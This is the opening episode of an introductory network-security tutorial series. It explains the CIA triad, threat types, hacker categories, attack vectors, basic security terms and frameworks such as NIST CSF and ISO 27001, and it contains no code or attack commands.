Introduction: Why Should You Learn Network Security?

In the digital age, we send and receive vast amounts of data through networks every day. Online banking, email, social media, cloud services—most aspects of our daily lives depend on networks. In this environment, network security is no longer optional but essential.

This series is designed to help you learn network security step by step, from basic concepts to practical applications. In this first part, we'll cover the fundamental concepts of security and understanding threats.

1. The Three Pillars of Information Security (CIA Triad)

The core of information security consists of three elements known as the CIA Triad. These three elements form the foundation of all security policies and system design.

1.1 Confidentiality

Confidentiality ensures that only authorized users can access information. It prevents sensitive data from being exposed without authorization.

  • Implementation methods: Encryption, access control, authentication systems
  • Examples: HTTPS communication, database encryption, Multi-Factor Authentication (MFA)
  • Threat examples: Eavesdropping, data leaks, sniffing attacks

1.2 Integrity

Integrity ensures that data has not been modified in unauthorized ways. The goal is to maintain the accuracy and reliability of data.

  • Implementation methods: Hash functions, digital signatures, version control
  • Examples: File checksum verification, blockchain technology, audit logs
  • Threat examples: Data tampering, Man-in-the-Middle (MITM) attacks, SQL injection

1.3 Availability

Availability ensures that authorized users can access information and systems whenever needed.

  • Implementation methods: Redundancy, backup, disaster recovery plans
  • Examples: Load balancing, RAID configuration, CDN utilization
  • Threat examples: DDoS attacks, ransomware, hardware failures

2. What is Network Security?

Network security is the totality of policies, procedures, and technologies designed to protect computer networks and their data from unauthorized access, misuse, modification, and destruction.

2.1 Scope of Network Security

  • Physical security: Server room access control, equipment protection
  • Technical security: Firewalls, IDS/IPS, encryption
  • Administrative security: Policy establishment, training, auditing

2.2 Defense in Depth

Effective network security applies multiple layers of security measures rather than a single line of defense. This is called the "Defense in Depth" strategy.

Perimeter Security
    |
Network Security
    |
Host Security
    |
Application Security
    |
Data Security

3. Types of Security Threats

Security threats can be broadly classified into passive attacks and active attacks.

3.1 Passive Attacks

Passive attacks collect information without affecting system resources. Prevention is important because they are difficult to detect.

  • Eavesdropping: Secretly intercepting network traffic to collect information
  • Traffic Analysis: Analyzing communication patterns to extract useful information
  • Scanning: Searching for vulnerabilities in networks and systems

3.2 Active Attacks

Active attacks directly modify or damage systems or data.

  • Masquerade: Impersonating authorized users or systems
  • Replay: Capturing and retransmitting legitimate data transmissions
  • Modification: Altering data in transit
  • Denial of Service: Exhausting system resources to disrupt normal services
Category Passive Attacks Active Attacks
Purpose Information gathering System damage/modification
Detection difficulty Difficult Relatively easy
Response strategy Prevention-focused Detection and response
Examples Sniffing, port scanning DDoS, malware

4. Types and Motivations of Hackers

Hackers are classified into several types based on their motivations and the legality of their actions.

4.1 White Hat Hackers

Also known as ethical hackers, they find and report security vulnerabilities with organizational permission.

  • Role: Penetration testing, security audits, vulnerability assessments
  • Motivation: Security enhancement, professional activity, legitimate compensation

4.2 Black Hat Hackers

Hackers who intrude systems for malicious purposes.

  • Role: Data theft, system destruction, financial gain pursuit
  • Motivation: Financial gain, notoriety, personal grudges

4.3 Gray Hat Hackers

Hackers who operate in the gray area between white hat and black hat.

  • Characteristics: Discover vulnerabilities without permission but request compensation or publicly disclose them
  • Motivation: Technical curiosity, reputation, compensation expectation

4.4 Other Types

  • Script Kiddies: Novice hackers who use existing tools without technical knowledge
  • Hacktivists: Activists who hack for political/social purposes
  • State-Sponsored Hackers: Those who conduct cyber operations with government support
  • Insider Threats: Malicious or negligent employees within an organization

5. Attack Vectors and Attack Surface

5.1 Attack Vector

An attack vector is the path or method an attacker uses to penetrate a system.

  • Email: Phishing, malicious attachments, spear phishing
  • Web: Malicious websites, drive-by downloads, XSS
  • Network: Port vulnerabilities, protocol exploitation, wireless network attacks
  • Social Engineering: Information theft through social engineering techniques
  • Physical Access: USB drops, hardware manipulation, theft
  • Supply Chain: Software update tampering, third-party library vulnerabilities

5.2 Attack Surface

The attack surface is the sum of all potential entry points where an attacker could penetrate.

  • Digital attack surface: Open ports, web applications, APIs, cloud services
  • Physical attack surface: Offices, server rooms, removable storage devices
  • Social/human attack surface: Employees, partners, customers

Security Tip: Minimizing the attack surface is a fundamental principle of security. Disable unnecessary services and apply the principle of least privilege.

6. Security Terminology

Here are essential terms you need to know for learning network security.

6.1 Vulnerability

A security weakness in a system or application that an attacker can exploit.

  • Types: Software bugs, configuration errors, design flaws
  • Management: Regular vulnerability scanning, patch management, security assessments

6.2 Exploit

Code, technique, or method for actually attacking a vulnerability.

  • Types: Local exploits, remote exploits, client-side exploits
  • Distribution: Exploit kits, public PoC (Proof of Concept)

6.3 Payload

Malicious code or commands executed after a successful exploit.

  • Types: Reverse shell, backdoor, ransomware, keylogger
  • Purpose: Establishing persistent access, data theft, system control

6.4 Zero-day

A vulnerability unknown to the software vendor or the public, or an attack exploiting such a vulnerability.

  • Risk: Extremely difficult to defend against as no patch exists
  • Response: Behavior-based detection, network segmentation, principle of least privilege
  • Market: Zero-day vulnerabilities can be traded at high prices

6.5 Additional Terms

Term Description
CVE Common Vulnerabilities and Exposures - Standard identifier for disclosed vulnerabilities
CVSS Common Vulnerability Scoring System - Vulnerability severity score (0-10)
APT Advanced Persistent Threat
IoC Indicators of Compromise
TTPs Tactics, Techniques, and Procedures - Attacker's operational methods

7. Introduction to Security Frameworks

Internationally recognized frameworks and standards exist for systematic security management.

7.1 NIST Cybersecurity Framework

A cybersecurity framework developed by the National Institute of Standards and Technology (NIST).

Five Core Functions:

  1. Identify: Understand assets, risks, and governance
  2. Protect: Implement appropriate safeguards
  3. Detect: Identify security events
  4. Respond: Take action on detected incidents
  5. Recover: Restore to normal operations
NIST CSF Structure:
+--------+   +--------+   +--------+   +--------+   +--------+
|Identify|-->|Protect |-->| Detect |-->|Respond |-->|Recover |
+--------+   +--------+   +--------+   +--------+   +--------+

7.2 ISO/IEC 27001

The international standard for Information Security Management Systems (ISMS).

  • Purpose: Systematically protect organizational information assets
  • Structure: 14 domains, 114 control items (Annex A)
  • Certification: Certification available through third-party certification bodies

Key Domains:

  • Information security policies
  • Organization of information security
  • Human resource security
  • Asset management
  • Access control
  • Cryptography
  • Physical and environmental security
  • Operations security
  • Communications security
  • System acquisition, development and maintenance
  • Supplier relationships
  • Information security incident management
  • Information security aspects of business continuity
  • Compliance

7.3 Other Frameworks

  • CIS Controls: 20 prioritized security control items
  • COBIT: IT governance and management framework
  • MITRE ATT&CK: Knowledge base of attacker tactics and techniques
  • PCI DSS: Payment Card Industry Data Security Standard

Conclusion and Next Episode Preview

In this episode, we covered the core concepts that form the foundation of network security. We discussed the CIA Triad, types of security threats, hacker classifications, key security terms, and frameworks for systematic security management.

Understanding these fundamental concepts firmly is the first step toward practical security. Rather than just learning how to use tools, understanding why security is necessary and what threats exist enables effective defense.

In the next episode, we'll review the OSI 7-layer model and examine the security threats that can occur at each layer and how to respond to them. We'll also cover actual attack techniques such as ARP spoofing, IP spoofing, and TCP SYN Flood, as well as packet analysis basics using Wireshark.

Security is a process, not a product. Continue to develop your security capabilities through ongoing learning and practice.